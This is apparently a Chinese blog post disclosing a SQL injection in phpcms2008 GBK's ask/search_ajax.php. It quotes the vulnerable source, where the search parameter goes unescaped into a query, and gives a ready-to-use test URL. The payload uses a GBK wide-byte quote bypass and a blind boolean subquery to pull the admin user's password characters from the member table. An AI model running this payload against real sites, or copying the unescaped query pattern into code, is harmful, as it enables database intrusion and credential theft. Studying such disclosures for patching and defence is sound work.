phpcms2008-0day ask/search_ajax.php

受影响程序: phpcms2008 gbk 漏洞文件:ask/search_ajax.php code: <?php require './include/common.inc.php';require_once MOD_ROOT.'include/ask.class.php';$ask = new ask();header(...

受影响程序: phpcms2008 gbk

漏洞文件:ask/search_ajax.php

code:

<?php
require './include/common.inc.php';
require_once MOD_ROOT.'include/ask.class.php';
$ask = new ask();
header('Content-type: text/html; charset=utf-8');
if(strtolower(CHARSET) != 'utf-8') $q = iconv(CHARSET, 'utf-8', $q);
if($q)
{
$where = " title LIKE '%$q%' AND status = 5";
}
else
{
exit('null');
}
$infos = $ask->listinfo($where, 'askid DESC', '', 10);

foreach($infos as $key=>$val)
{
$val['title'] = str_replace($q, '<span class="c_orange">'.$q.'</span>', $val['title']);
$info[$key]['title'] = CHARSET != 'utf-8' ? iconv(CHARSET, 'utf-8', $val['title']) : $val['title'];
$info[$key]['url'] = $val['url'];
}

echo(json_encode($info));
?>

测试方法:
ask/search_ajax.php?q=s%E6'/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636D73)>52%23

  • 发表于 2021-04-10 08:47
  • 阅读 ( 219 )
  • 分类:互联网

0 条评论

请先 登录 后评论
tl801
tl801

669 篇文章

你可能感兴趣的文章

相关问题